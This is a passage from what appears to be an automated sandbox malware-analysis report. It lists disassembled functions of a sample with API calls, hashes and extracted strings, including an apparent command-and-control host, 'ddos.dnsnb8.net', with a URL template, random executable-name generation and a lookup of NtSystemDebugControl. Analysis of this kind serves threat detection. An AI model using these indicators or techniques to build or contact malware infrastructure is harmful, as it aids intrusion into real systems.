                                • CloseHandle.KERNEL32(I%[), ref: 005B18E9
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005B18F0
                                • GetExitCodeProcess.KERNEL32(?,?), ref: 005B1901
                                • CloseHandle.KERNEL32(?), ref: 005B190A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                • String ID: I%[
                                • API String ID: 876959470-2487236550
                                • Opcode ID: f0f4c7f16a06b51f8a17dd048fa9ed115dccc2dc8f43140feb87f6cd3b422ec3
                                • Instruction ID: 9bd785ffd2bce123ca48470ef9a836da5bdec2f697798348de4077aadf0ad01d
                                • Opcode Fuzzy Hash: f0f4c7f16a06b51f8a17dd048fa9ed115dccc2dc8f43140feb87f6cd3b422ec3
                                • Instruction Fuzzy Hash: BB017C7290116CBBCB21AB96DC4DDDFBF3DFF85760F104121FA15A51A0D6316A18DAA0
                                Function 005B185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,005B1118), ref: 005B1867
                                • srand.MSVCRT ref: 005B1878
                                • rand.MSVCRT ref: 005B1880
                                • srand.MSVCRT ref: 005B1890
                                • rand.MSVCRT ref: 005B1894
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: Timerandsrand$FileSystem
                                • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                • API String ID: 4106363736-3273462101
                                • Opcode ID: cd3a1b8994cda8aed188032d5ac0ab83eed427ce3e15717326df9edd75bd8319
                                • Instruction ID: cea7d3df951bc88e44a2524cccff689383c0aebbf74b75bfa3f72c8424a703ea
                                • Opcode Fuzzy Hash: cd3a1b8994cda8aed188032d5ac0ab83eed427ce3e15717326df9edd75bd8319
                                • Instruction Fuzzy Hash: EAE0D877A0021CBBD700B7F9EC4A89EBBACDE84161B100637F600E3250E570FE488AB4
                                Function 005B2692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,005B29DB,?,00000001), ref: 005B26A7
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,005B29DB,?,00000001), ref: 005B26B5
                                • lstrlen.KERNEL32(?), ref: 005B26C4
                                • ??2@YAPAXI@Z.MSVCRT ref: 005B26CE
                                • lstrcpy.KERNEL32(00000004,?), ref: 005B26E3
                                • lstrcpy.KERNEL32(?,00000004), ref: 005B271F
                                • ??3@YAXPAX@Z.MSVCRT ref: 005B272D
                                • SetEvent.KERNEL32 ref: 005B273C
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                • String ID:
                                • API String ID: 41106472-0
                                • Opcode ID: f4dcd34f820b5d2e14646681b29d989309e9820ca3889e295da23dfa413d0952
                                • Instruction ID: 372bfdb8327d6c99a62166868bd5a8fc463a951b581cfb754ef3afb5e8ac0e29
                                • Opcode Fuzzy Hash: f4dcd34f820b5d2e14646681b29d989309e9820ca3889e295da23dfa413d0952
                                • Instruction Fuzzy Hash: 49119D36500214EFCBB1AF15EC488AA7FA9FFA4720B144215F85897121DB30BD8AEF60
                                Function 005B1B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • pICqreLktfNAPXATguYKaQGFwazsqYEbzivUJMRmSxkPuBOEdZRJtWndvwRgNpjNOXhjTkYMcDhXMJazQKyAmWywfqnrotsVBmnieKDSceGUuiZfbbVQxgCPpojhWdclFTUFSGIBxHIvZLDoLylClEOHrHsV, xrefs: 005B1B8A, 005B1B9C, 005B1C15, 005B1C49
                                • .exe, xrefs: 005B1C57
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: lstrcatmemcpymemsetrandsrand
                                • String ID: .exe$pICqreLktfNAPXATguYKaQGFwazsqYEbzivUJMRmSxkPuBOEdZRJtWndvwRgNpjNOXhjTkYMcDhXMJazQKyAmWywfqnrotsVBmnieKDSceGUuiZfbbVQxgCPpojhWdclFTUFSGIBxHIvZLDoLylClEOHrHsV
                                • API String ID: 122620767-1135942405
                                • Opcode ID: ca05bd312b2a2fa4ae062242ce7c8dd1ba84f5540a29ecaaeb753647ae266758
                                • Instruction ID: 2b87c2e115b99c4c511927e6a7a54c9d9c19d0e46383f9a934471f32152c78e2
                                • Opcode Fuzzy Hash: ca05bd312b2a2fa4ae062242ce7c8dd1ba84f5540a29ecaaeb753647ae266758
                                • Instruction Fuzzy Hash: 8921EB22F046906ED3F613356C61BEE3F04FFF3720F1900A9FA811B193D1243A898668
                                Function 005B1319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 005B1334
                                • GetProcAddress.KERNEL32(00000000), ref: 005B133B
                                • memset.MSVCRT ref: 005B1359
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcmemset
                                • String ID: NtSystemDebugControl$ntdll.dll
                                • API String ID: 3137504439-2438149413
                                • Opcode ID: 2a773444f0e3ccaa36975c5dd3870aabc3198ee7ac5369e85ed6abfa514536bb
                                • Instruction ID: 3fd85786e036941ca263fce1040bde266b58677d8ccf7ad5502867058755b98c
                                • Opcode Fuzzy Hash: 2a773444f0e3ccaa36975c5dd3870aabc3198ee7ac5369e85ed6abfa514536bb
                                • Instruction Fuzzy Hash: D201847160070DFFDB50DF98EC899AFBFACFB51314F40462AF902A1141E370A605DA55
                                Function 005B1DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: strrchr$lstrcmpilstrcpylstrlen
                                • String ID:
                                • API String ID: 3636361484-0
                                • Opcode ID: b00a9d92a5a18ebe49251edc95eaf98f5dc48b5a71df7f8a351cb189eb7a1688
                                • Instruction ID: ec055d6232fafc83942a6d9c118ed70c180c4a20d0bc1385cf6fc60b6b45a01b
                                • Opcode Fuzzy Hash: b00a9d92a5a18ebe49251edc95eaf98f5dc48b5a71df7f8a351cb189eb7a1688
                                • Instruction Fuzzy Hash: AC01FE729046196FDF606760DC4DBD67FDCFF14310F440065D945E3090D674FA888BA4
                                Function 005B6014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 005B603C
                                • GetProcAddress.KERNEL32(00000000,005B6064), ref: 005B604F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: kernel32.dll
                                • API String ID: 1646373207-1793498882
                                • Opcode ID: 07897bd8fffc32d902e34b5cb51a3fbf165b456ea5825e00ad690aa181e93c0f
                                • Instruction ID: 028c4afa6490b74f0d86a60b2f3f675bf97106ab9342adfd604b8436f3b75105
                                • Opcode Fuzzy Hash: 07897bd8fffc32d902e34b5cb51a3fbf165b456ea5825e00ad690aa181e93c0f
                                • Instruction Fuzzy Hash: C6F0F6B11442898FEF708E64CC84BDE3BE4FB05700F50042AE909CB241CB3896058B14